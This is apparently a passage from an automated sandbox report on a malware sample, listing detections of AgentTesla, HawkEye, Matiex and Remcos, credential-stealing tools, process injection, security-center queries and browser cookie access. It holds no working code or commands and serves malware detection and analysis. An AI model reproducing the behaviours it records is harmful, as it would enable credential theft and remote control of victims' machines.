                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\origigoods40.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: 7_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
Source: C:\Users\user\Desktop\Mixed Items.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 00000019.00000003.321855545.0000000004361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.328468981.00000000043CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.476647618.0000000000162000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.476654920.0000000000E52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.300769006.0000000000FE3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.516404488.0000000003411000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.332943540.0000000000162000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, type: DROPPED
Source: Yara match | File source: 33.2.origigoods20.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.0.origigoods20.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.origigoods40.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.0.origigoods40.exe.160000.0.unpack, type: UNPACKEDPE
Yara detected HawkEye Keylogger
Source: Yara match | File source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.445844944.0000000002FEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
Source: Yara match | File source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
Yara detected MailPassView
Source: Yara match | File source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.446976394.0000000003BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
Source: Yara match | File source: 30.0.hawkgoods.exe.51fa72.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.3bc7e00.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.3bc7e00.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.51fa72.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
Yara detected Matiex Keylogger
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
Source: Yara match | File source: 31.0.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.0.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
Yara detected Remcos RAT
Source: Yara match | File source: 00000025.00000002.488787782.0000000000982000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.490909756.0000000000A7A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPED
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Yara detected WebBrowserPassView password recovery tool
Source: Yara match | File source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.446976394.0000000003BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
Source: Yara match | File source: 30.0.hawkgoods.exe.4c9c0d.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c9c0d.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.3be0240.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.3bc7e00.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.3be0240.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.516404488.0000000003411000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.517244738.00000000028D1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Detected HawkEye Rat
Source: hawkgoods.exe | String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
Source: hawkgoods.exe | String found in binary or memory: HawkEyeKeylogger
Source: hawkgoods.exe | String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: hawkgoods.exe | String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
Yara detected AgentTesla
Source: Yara match | File source: 00000019.00000003.321855545.0000000004361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.510313698.0000000002771000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.328468981.00000000043CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.476647618.0000000000162000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.476654920.0000000000E52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.300769006.0000000000FE3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.516404488.0000000003411000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.332943540.0000000000162000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, type: DROPPED
Source: Yara match | File source: 33.2.origigoods20.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.0.origigoods20.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.origigoods40.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.0.origigoods40.exe.160000.0.unpack, type: UNPACKEDPE
Yara detected HawkEye Keylogger
Source: Yara match | File source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.445844944.0000000002FEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
Source: Yara match | File source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
Yara detected Matiex Keylogger
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.313769407.00000000037B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.476632403.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000000.312425541.00000000004D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
Source: Yara match | File source: 31.0.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.Matiexgoods.exe.4f277c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.0.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.Matiexgoods.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
Yara detected Remcos RAT
Source: Yara match | File source: 00000025.00000002.488787782.0000000000982000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
